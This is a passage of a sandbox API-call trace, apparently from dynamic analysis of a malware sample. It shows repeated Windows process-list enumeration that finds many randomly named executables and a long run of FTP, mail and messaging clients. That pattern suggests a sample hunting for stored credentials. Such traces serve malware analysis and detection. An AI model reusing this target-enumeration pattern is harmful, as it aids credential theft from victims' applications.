dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0239.451] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0239.453] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0239.454] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.456] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0239.457] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0239.459] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0239.460] CloseHandle (hObject=0x1b08) returned 1 [0239.460] Sleep (dwMilliseconds=0x64) [0239.607] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0239.617] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.618] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0239.620] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0239.624] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.625] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0239.627] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.628] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0239.629] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0239.631] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0239.632] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.634] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.635] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0239.639] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.640] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.642] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.643] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.645] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.646] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.647] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.649] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0239.650] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0239.702] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0239.704] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.705] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.707] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0239.708] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0239.710] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0239.711] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0239.713] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.785] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0239.787] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0239.788] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.789] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0239.791] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0239.795] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0239.796] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0239.797] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0239.799] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0239.800] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0239.801] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0239.803] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0239.804] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0239.805] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0239.807] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0239.840] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0239.841] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0239.842] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0239.844] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0239.845] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0239.846] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0239.848] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0239.852] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0239.853] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0239.854] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0239.856] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0239.857] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0239.859] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0239.860] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0239.862] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0239.863] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0239.865] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0239.867] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0239.868] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0239.870] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0239.874] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0239.876] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0239.877] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0239.879] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0239.881] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0239.882] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0239.884] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0239.923] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0239.925] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0239.926] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0239.928] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0239.929] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0239.931] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0239.935] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 